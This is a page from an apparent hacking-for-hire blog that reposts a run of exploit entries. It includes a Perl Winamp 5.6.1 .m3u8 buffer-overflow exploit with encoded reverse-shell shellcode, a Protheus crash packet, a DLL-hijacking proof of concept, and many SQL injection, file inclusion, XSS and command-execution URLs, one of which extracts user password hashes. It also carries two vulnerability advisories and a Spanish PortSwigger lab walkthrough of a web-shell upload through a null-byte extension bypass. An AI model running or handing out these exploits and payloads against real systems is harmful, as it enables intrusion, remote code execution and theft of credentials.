Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863112455

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/47333/info

Winamp is prone to a remote buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Winamp 5.6.1 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl

###
# Title : Winamp 5.6.1 (.m3u8) Stack Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com || ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Stack Overflow
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
##
# [»] ~ special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team
###

my $header = "#EXTM3U\n";
my $junk = "\x41" x 16240; # Buffer Junk
my $eip = "\xad\x86\x0e\x07"; # overwrite EIP - 070E86AD | FFD4 CALL ESP nde.dll
my $seh = pack('V',0x10017928);  # add ESP,4404 
$seh = $seh.pack('V',0x00000003); # Value de : EAX
$seh = $seh."\x41" x 11;
$seh = $seh.pack('V',0x41414141); # Value de : ECX
$seh = $seh."\x41" x 3;
$seh = $seh.pack('V',0x007EA478); # Value de : EDX
$seh = $seh."\x41" x 22;
$seh = $seh.pack('V',0x40000001); # Value de : EBX
$seh = $seh."\x41" x 8;
$seh = $seh.pack('V',0x028F1DB0); # Valeu de : ESP
$seh = $seh."\x41" x 12;
$seh = $seh.pack('V',0x77230459); # Valeu de : EBP
$seh = $seh."\x41" x 10;
$seh = $seh.pack('V',0x08FD62A8); # Valeu de : ESI
$seh = $seh."\x41" x 11;
$seh = $seh.pack('V',0x00497300); # Valeu de : EDI
$seh = $seh."\x41" x 2;
$seh = $seh.pack('V',0x08FD293C); # Valeu de : EIP
$seh = $seh."\x41" x 5;
my $nops = "\x90" x 100; # Nop
my $space = "\x41" x (43492 - length($junk) - length($nops));
my $shellcode = # windows/shell_reverse_tcp (http://www.metasploit.com)
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d" .
"\x38\x4e\x69\x47\x70\x43\x30\x45\x50\x45\x30\x4d\x59\x4a" .
"\x45\x45\x61\x48\x52\x43\x54\x4e\x6b\x50\x52\x50\x30\x4c" .
"\x4b\x51\x42\x46\x6c\x4e\x6b\x46\x32\x46\x74\x4c\x4b\x50" .
"\x72\x46\x48\x46\x6f\x4f\x47\x43\x7a\x51\x36\x46\x51\x49" .
"\x6f\x46\x51\x4f\x30\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x43" .
"\x32\x44\x6c\x47\x50\x4f\x31\x48\x4f\x46\x6d\x43\x31\x49" .
"\x57\x48\x62\x4c\x30\x51\x42\x42\x77\x4c\x4b\x50\x52\x42" .
"\x30\x4c\x4b\x43\x72\x45\x6c\x46\x61\x4a\x70\x4c\x4b\x43" .
"\x70\x43\x48\x4e\x65\x4b\x70\x42\x54\x50\x4a\x45\x51\x48" .
"\x50\x46\x30\x4e\x6b\x50\x48\x45\x48\x4e\x6b\x51\x48\x51" .
"\x30\x45\x51\x48\x53\x48\x63\x47\x4c\x43\x79\x4e\x6b\x47" .
"\x44\x4e\x6b\x46\x61\x4b\x66\x50\x31\x4b\x4f\x44\x71\x4f" .
"\x30\x4e\x4c\x49\x51\x4a\x6f\x46\x6d\x46\x61\x4f\x37\x46" .
"\x58\x4d\x30\x42\x55\x4a\x54\x46\x63\x43\x4d\x4c\x38\x47" .
"\x4b\x51\x6d\x44\x64\x44\x35\x49\x72\x43\x68\x4c\x4b\x50" .
"\x58\x45\x74\x47\x71\x48\x53\x51\x76\x4e\x6b\x46\x6c\x42" .
"\x6b\x4c\x4b\x42\x78\x47\x6c\x45\x51\x48\x53\x4e\x6b\x45" .
"\x54\x4c\x4b\x47\x71\x48\x50\x4f\x79\x42\x64\x44\x64\x47" .
"\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x43\x6a\x46\x31\x4b" .
"\x4f\x4d\x30\x50\x58\x43\x6f\x43\x6a\x4c\x4b\x45\x42\x48" .
"\x6b\x4e\x66\x43\x6d\x42\x48\x50\x33\x44\x72\x45\x50\x43" .
"\x30\x51\x78\x42\x57\x42\x53\x46\x52\x43\x6f\x50\x54\x43" .
"\x58\x42\x6c\x44\x37\x44\x66\x45\x57\x49\x6f\x48\x55\x48" .
"\x38\x4c\x50\x47\x71\x45\x50\x47\x70\x47\x59\x4b\x74\x51" .
"\x44\x42\x70\x42\x48\x44\x69\x4d\x50\x42\x4b\x43\x30\x49" .
"\x6f\x48\x55\x50\x50\x42\x70\x50\x50\x42\x70\x47\x30\x42" .
"\x70\x43\x70\x50\x50\x43\x58\x48\x6a\x44\x4f\x49\x4f\x4d" .
"\x30\x49\x6f\x4b\x65\x4e\x69\x48\x47\x42\x48\x43\x4f\x45" .
"\x50\x43\x30\x47\x71\x43\x58\x43\x32\x45\x50\x44\x51\x43" .
"\x6c\x4e\x69\x4a\x46\x51\x7a\x42\x30\x51\x46\x43\x67\x42" .
"\x48\x4d\x49\x4e\x45\x51\x64\x51\x71\x49\x6f\x4e\x35\x50" .
"\x68\x42\x43\x42\x4d\x42\x44\x47\x70\x4c\x49\x48\x63\x51" .
"\x47\x51\x47\x51\x47\x50\x31\x4b\x46\x51\x7a\x47\x62\x51" .
"\x49\x50\x56\x4d\x32\x49\x6d\x50\x66\x4f\x37\x42\x64\x46" .
"\x44\x45\x6c\x47\x71\x43\x31\x4c\x4d\x50\x44\x51\x34\x42" .
"\x30\x4a\x66\x43\x30\x43\x74\x50\x54\x42\x70\x43\x66\x43" .
"\x66\x51\x46\x47\x36\x46\x36\x42\x6e\x50\x56\x46\x36\x42" .
"\x73\x43\x66\x50\x68\x44\x39\x48\x4c\x47\x4f\x4b\x36\x4b" .
"\x4f\x48\x55\x4c\x49\x4b\x50\x50\x4e\x42\x76\x43\x76\x49" .
"\x6f\x50\x30\x42\x48\x43\x38\x4c\x47\x47\x6d\x43\x50\x49" .
"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4d\x65\x4d\x72\x51\x46\x51" .
"\x78\x4d\x76\x4e\x75\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47" .
"\x4c\x46\x66\x43\x4c\x45\x5a\x4b\x30\x49\x6b\x49\x70\x43" .
"\x45\x45\x55\x4d\x6b\x51\x57\x44\x53\x43\x42\x42\x4f\x51" .
"\x7a\x47\x70\x46\x33\x4b\x4f\x49\x45\x41\x41"; 
my $end = "\x90" x (20000 - $nops); # Nop sled
open(FILE,'>>KedAns.m3u8');
print FILE $header.$junk.$space.$seh.$nops.$eip.$shellcode.$end;
close(FILE);
HireHackking 
source: https://www.securityfocus.com/bid/47342/info

TOTVS ERP Microsiga Protheus is prone to a denial-of-service vulnerability due to a memory-corruption issue.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible; however, this has not been confirmed. 

--- CODE SNIPPET BEGIN ---
if options.target == 8:
      version = "20081215030344"
else:
      version = "20100812040605"

packet_handshake = (
      "%14s"
      "\x00\x01"
      "%36s\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      "%32s\x00"
      "%s\x00"
      "\x00\x00\x14\x01"
) % ("A"*14, "B"*36, "C"*32, version)

packet_environ = (
      "\x42\x00\x00\x00\x21\xab\x42\x00\x00\x00"
      "\xff\xff\xff\xff" # Memory Corruption (-1 as size)
#      "\x38\x00\x00\x00" # OK (56 bytes)
      "\x01\x00\x3e\x82\x01\x03\x02\x04\x00\x00"
      "\x00\x00%7s\x00\x00\x00\x00\x00\x00"
      "%11s\x00\x00\x00\x00\x00\x00"
      "\x01\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00"
) % ("D"*7, "E"*11)
--- CODE SNIPPET END ---
HireHackking 
// source: https://www.securityfocus.com/bid/47349/info

EC Software Help & Manual is prone to an arbitrary-code-execution vulnerability.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.

Help & Manual 5.5.1 Build 1296 is vulnerable; other versions may also be affected. 

/*


Help & Manual Professional Edition 5.5.1 (ijl15.dll) DLL Hijacking Exploit

Vendor: EC Software GmbH
Product web page: http://www.helpandmanual.com
Affected version: 5.5.1 Build 1296

Summary: Help & Manual 5 is a single-source help authoring and content
management system for both single and multi-author editing.

Desc: Help & Manual suffers from a DLL hijacking vulnerability that enables
the attacker to execute arbitrary code on the affected machine. The vulnerable
extensions are hmxz, hmxp, hmskin, hmx, hm3, hpj, hlp and chm thru ijl15.dll
Intel's library.

Tested on: Microsoft Windows XP Professional SP3 EN

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com


Advisory ID: ZSL-2011-5009
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5009.php


06.04.2011


*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
HireHackking 
source: https://www.securityfocus.com/bid/47371/info

Agahi Advertisement CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Agahi Advertisement CMS 4.0 is vulnerable; other versions may also be affected. 

http:/www.example.com/view_ad.php?id=-523+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
HireHackking

PhpAlbum.net 0.4.1-14_fix06 - 'var3' Remote Command Execution

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47369/info PhpAlbum.net is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied input. An attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable process. PhpAlbum.net 0.4.1-14_fix06 is vulnerable; other versions may also be affected. http://www.example.com/main.php?cmd=setup&var1=user&var3=1-file_put_contents('./x.xxx','xxxx')
HireHackking
source: https://www.securityfocus.com/bid/47375/info Qianbo Enterprise Web Site Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com]/en/Search.Asp?Range=Product&Keyword=[xss]
HireHackking

PhoenixCMS 1.7 - Local File Inclusion / SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47389/info PhoenixCMS is prone to a local file-include vulnerability and an SQL-injection vulnerability. An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process. The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PhoenixCMS 1.7.0 is vulnerable; other versions may also be affected. http://www.example.com/[path]/modules.php?name=Work_Probe&file=../../WS_FTP.LOG%00 http://www.example.com/[path]/modules.php?name=News&file=../../WS_FTP.LOG%00 http://www.example.com/modules.php?name=Surveys&op=results&pollID=3+and+1=2+union+select+1,version(),3,4,5--
HireHackking
source: https://www.securityfocus.com/bid/47390/info Technicolor THOMSON TG585v7 Wireless Router is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. Attackers may exploit this issue by enticing victims into visiting a malicious site. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Firmware versions prior to 8.2.7.6 are vulnerable. http://www.example.com/cgi/b/ic/connect/?url=[XSS]
HireHackking

Pimcore CMS 2.3.0/3.0 - SQL Injection

HACKER · %s · %s

Document Title: =============== Pimcore v3.0 & v2.3.0 CMS - SQL Injection Vulnerability References (Source): ==================== http://vulnerability-lab.com/get_content.php?id=1363 Release Date: ============= 2014-12-16 Vulnerability Laboratory ID (VL-ID): ==================================== 1363 Common Vulnerability Scoring System: ==================================== 6.4 Product & Service Introduction: =============================== Pimcore is a powerful and robust Zend Framework based PHP content management system (CMS) for creating and managing digital content and assets licensed under the open-source BSD license. Create outstanding digital experiences on the most flexible content management platform available. Manage and edit any type of digital content, for any device and channel in a 100% flexible and personalized way. Pimcore features award-winning single-source and multi-channel publishing functionality making it easy to manage, update, and integrate content and data from various sources. With pimcore brands can create and manage rich digital experiences for all of their output channels at once: web, mobile, apps, social platforms, print and digital signage. With pimcore you can truly `edit once & reuse anywhere`. (Copy of the Homepage: https://www.pimcore.org/ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in the official Pimcore v3.0 & v2.3.0 Content Management System (Web-Application). Vulnerability Disclosure Timeline: ================================== 2014-12-16: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Pimcore GmbH Product: PimCore - Content Management System 3.0 Release Candidate & 2.3.0 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A remote sql injection web vulnerability has been discovered in the official Pimcore v3.0 & v2.3.0 Content Management System. The vulnerability allows remote attackers and local privileged user accounts to inject own sql commands to compromise the web-server dbms of pimcore. The security vulnerability is located in the name value GET method request of the pimcore mysql module. Remote attackers and local privileged user accounts are able to compromise the application service by injection of malicious sql commands. The request method to inject the code is GET and the attack vector is on the application-side of the modules. Remote attackers are able to use the inner application functions of the class module to perform an execution on the application-side unauthorized through the admin acp. The security risk of the sql vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. Exploitation of the remote sql injection web vulnerability requires no privileged application user account or a low privileged user account without user interaction. Successful exploitation of the sql injection vulnerability results in application and web-service or dbms compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] backup/mysql Vulnerable Parameter(s): [+] name Proof of Concept (PoC): ======================= The sql injection vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: ./backup/mysql?_dc=1415886023081&name=-1%27[SQL INJECTION VULNERABILITY!]--&type=BASE%20TABLE --- PoC Session Logs [GET] --- Status: 200[OK] GET http://pimcore.localhost:8080/admin/backup/mysql?_dc=1415886023081&name=-1%27[SQL INJECTION VULNERABILITY!]--&type=BASE%20TABLE Load Flags[VALIDATE_NEVER LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[495] Mime Type[text/html] Request Header: Host[pimcore.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Cookie[__utma=59704236.87754243.1415885491.1415885491.1415885491.1; __utmb=59704236.1.10.1415885491; __utmc=59704236; __utmz=59704236.1415885491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pimcore_admin_sid=28vctg6ilpedepa26b81gqeps5] Connection[keep-alive] Response Header: Date[Thu, 13 Nov 2014 13:55:50 GMT] Server[Apache/2.2.22 (Debian)] Set-Cookie[pimcore_admin_sid=28vctg6ilpedepa26b81gqeps5; path=/; HttpOnly] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Connection[close] Content-Encoding[gzip] X-Powered-By[pimcore] Content-Length[495] Content-Type[text/html] --- Error & Exception Logs --- Fatal error: Uncaught exception 'Zend_Db_Statement_Mysqli_Exception' with message 'Mysqli prepare error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1'' at line 1' in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php:77 - Stack trace: #0 /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement.php(115): Zend_Db_Statement_Mysqli->_prepare('SELECT * FROM -...') #1 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Mysqli.php(388): Zend_Db_Statement->__construct(Object(Zend_Db_Adapter_Mysqli), 'SELECT * FROM -...') #2 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(479): Zend_Db_Adapter_Mysqli->prepare('SELECT * FROM -...') #3 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(737): Zend_Db_Adapter_Abstract->query('SELECT * FROM -...', Array) #4 [internal function]: Zend_Db_Adapter_Abstract->fetchAll('SELECT * FROM -...') #5 /home/pimcore-service/www/pimcore/lib/Pimcore/Resource/Wrapper.php(230): call in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php on line 77 - Fatal error: Call to a member function isAllowed() on a non-object in /home/pimcore-service/www/pimcore/lib/Pimcore/Controller/Action/Admin/Element.php on line 37 - Fatal error: Uncaught exception 'Zend_Db_Statement_Mysqli_Exception' with message 'Mysqli prepare error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1'' at line 1' in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php:77 - Stack trace: #0 /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement.php(115): Zend_Db_Statement_Mysqli->_prepare('SELECT * FROM -...') #1 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Mysqli.php(388): Zend_Db_Statement->__construct(Object(Zend_Db_Adapter_Mysqli), 'SELECT * FROM -...') #2 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(479): Zend_Db_Adapter_Mysqli->prepare('SELECT * FROM -...') #3 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(737): Zend_Db_Adapter_Abstract->query('SELECT * FROM -...', Array) #4 [internal function]: Zend_Db_Adapter_Abstract->fetchAll('SELECT * FROM -...') #5 /home/pimcore-service/www/pimcore/lib/Pimcore/Resource/Wrapper.php(230): call in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php on line 77 Solution - Fix & Patch: ======================= The vulnerability can be patched by implementation of two prepared statements in the section were the vulnerable name value is in usage. Encode and parse also the qrcode and mysql GET method request to prevent exploitation. The fix for the backup routine is already in the main trunk and can be reviewed here: https://github.com/pimcore/pimcore/commit/93067d865affa5a0110ae7e9904cbc5ff5868376 Note: The patch will be part of the next version (RC 2) and the final 3.0 release. You can verify it also by downloading the lastest build from pimcore.org/download. Security Risk: ============== The security risk of the sql injection web vulnerability in the pimcore content management system is estimated as high. (CVSS 6.4) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking
Exploit Title: Easy File Sharing Webserver =>6.8 Persistent XSS Date: 12/26/14 Exploit Author: SickPsycko Vendor Homepage: http://www.sharing-file.com/ Version:6.8 Tested on: Windows 7 32bit The exploit is within the username field. So to exploit this vulnerability, One must place the payload into the specified field when registering. http://i.imgur.com/bibu81C.png Once logged in. User will be greeted with such.
HireHackking

ChillyCMS 1.2.1 - Multiple Remote File Inclusions

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47395/info chillyCMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow a remote attacker to obtain sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. chillyCMS 1.2.1 is vulnerable; other versions may also be affected. http://www.example.com/[path]/core/helpers.include.php?file=[Ev!l-Sh3ll] http://www.example.com/[path]/core/helpers.include.php?path=[Ev!l-Sh3ll] http://www.example.com/[path]/core/helpers.include.php?fullpath=[Ev!l-Sh3ll]
HireHackking

CRESUS - 'recette_detail.php' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47416/info CRESUS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/$path/ang/recette_detail.php?id=1 {SQL Injection}
HireHackking

XOOPS 2.5 - 'imagemanager.php' Local File Inclusion

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47418/info XOOPS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to view arbitrary local files within the context of the webserver process. Successfully exploiting this issue may lead to other attacks. XOOPS 2.5.0 is vulnerable; other versions may also be affected. http://www.example.com/[path]/imagemanager.php?target=/../../../../../../../../boot.ini%00&op=upload
HireHackking

Dalbum 1.43 - 'editini.php' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47427/info Dalbum is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Dalbum 1.43 is vulnerable; other versions may also be affected. http://www.example.com/editini.php?album=/Sample%20album/&url=[xss]
HireHackking
source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. This vulnerability affects the following supported versions: 8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 http://XXX.XXX.XXX.XXX/jde/E1Menu.maf Parameter: jdeowpBackButtonProtect * The GET request has been set to: >'"><script>alert(20639)</script> /jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED&%3E%27%22%3E%3Cscript%3Ealert%2820639%29%3C%2Fscript%3E=123 HTTP/1.0 Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=00002ZzkuqI4ibppzAAcyOOuBnh:14p7umbnp; e1MenuState=100003759| Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: XXX.XXX.XXX.XXX
HireHackking
En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Web shell upload via obfuscated file extension”.
Para resolver el laboratorio tenemos que subir un archivo PHP que lea y nos muestre el contenido del archivo /home/carlos/secret. Ya que para demostrar que hemos completado el laboratorio, deberemos introducir el contenido de este archivo.
Además, el servidor está configurado para que no acepte ciertas extensiones.
En este caso, el propio laboratorio nos proporciona una cuenta para iniciar sesión, por lo que vamos a hacerlo:
Una vez hemos iniciado sesión, nos encontramos con el perfil de la cuenta:
Una vez estamos en el perfil, como vemos, tenemos un campo de subida de archivos para actualizar el avatar de nuestra cuenta. Vamos a intentar aprovecharnos de esto para subir el siguiente archivo:
Antes que nada, vamos a preparar el burp suite para que intercepte las peticiones:
Una vez tenemos esta parte configurada, subimos el archivo:
Burp suite interceptará la petición de subida:
Para tratar mejor con el proceso de subida de archivos, vamos a pasar la petición al repeater pulsando Ctrl R:
Como vemos, en este caso, al darle al Send, vemos en la respuesta del servidor que solo los archivos JPG y PNG están permitidos.
Por lo que la idea va a ser introducir una doble extensión junto a un null byte para ver si podemos bypasear esta restricción:
Al enviar la petición, vemos como en la respuesta, el archivo se ha subido, no solo eso, sino que gracias al null byte, nos hemos desecho de la segunda extensión que habiamos puesto (.jpg). Por lo que con esto hecho, vamos a ver la respuesta en el navegador:
Ya no vamos a usar burp suite, por lo que desactivamos el proxy:
Una vez desactivado, nos volvemos a nuestro perfil:
Como vemos, el avatar se ha establecido, sin embargo, parece que ha ocurrido un fallo al cargar la imagen. Probablemente porque intenta cargar nuestro archivo PHP como si fuese una imagen y por eso falla. Vamos a acceder a la ruta directa de “la imagen” dandole click derecho:
Parece que nos da un problema, sin embargo, si nos fijamos en la URL, se nos intenta cargar el archivo readSecret.php%00.jpg, cuando realmente, el archivo resultante fue readSecret.php. Por lo que cambiamos la URL para acceder a este último archivo:
Y de esta forma, accedemos al código PHP y se interpreta, consiguiendo así que leamos el archivo secret.
Habiéndolo leído, ya simplemente enviamos la solución:
Y de esta forma, completamos el laboratorio:







HireHackking

RunCMS Module Partners - 'id' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47388/info The RunCMS 'partners' module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/[path]/modules/partners/index.php?op=visit_partner&id=1+and+2=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
HireHackking

4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injections

HACKER · %s · %s

source: https://www.securityfocus.com/bid/47394/info 4images is prone to multiple remote file-include vulnerabilities and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to execute arbitrary server-side script code on an affected computer in the context of the webserver process or compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. 4images 1.7.9 is vulnerable; other versions may also be affected. http://www.example.com/[path]/download.php?file_path=[Ev!l-Sh3ll] http://www.example.com/[path]/categories.php?upload_url=[Ev!l-Sh3ll] http://www.example.com/[path]/global.php?config=[Ev!l-Sh3ll http://www.example.com/[path]/details.php?cat_id_sql=0+AND+2=1
HireHackking

Wickr Desktop 2.2.1 Windows - Denial of Service

HACKER · %s · %s

Document Title: =============== Wickr Desktop v2.2.1 Windows - Denial of Service Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1377 Video: http://www.vulnerability-lab.com/get_content.php?id=1388 Release Date: ============= 2014-12-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1377 Common Vulnerability Scoring System: ==================================== 3.3 Product & Service Introduction: =============================== Wickr (pronounced `wicker`) is a proprietary instant messenger for iPhone and Android. Wickr allows users to exchange end-to-end encrypted and self-destructing messages, including photos and file attachments. The `self-destruct` part of the software is designed to use a `Secure File Shredder` which the company says `forensically erases unwanted files you deleted from your device`. However the company uses a proprietary algorithm to manage the data, a practice which is prone to error according to many security experts. On January 15, 2014, Wickr announced it is offering a US$100,000 bug bounty for those who find vulnerabilities that significantly impact users. In addition, a recipient can in general use other software and techniques like screen-capture capabilities or a separate camera to make permanent copies of the content. (Copy of the Homepage: https://wickr.com/ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research team discovered a denial of service web vulnerability in the offical Wickr Desktop v2.2.1 windows software. Vulnerability Disclosure 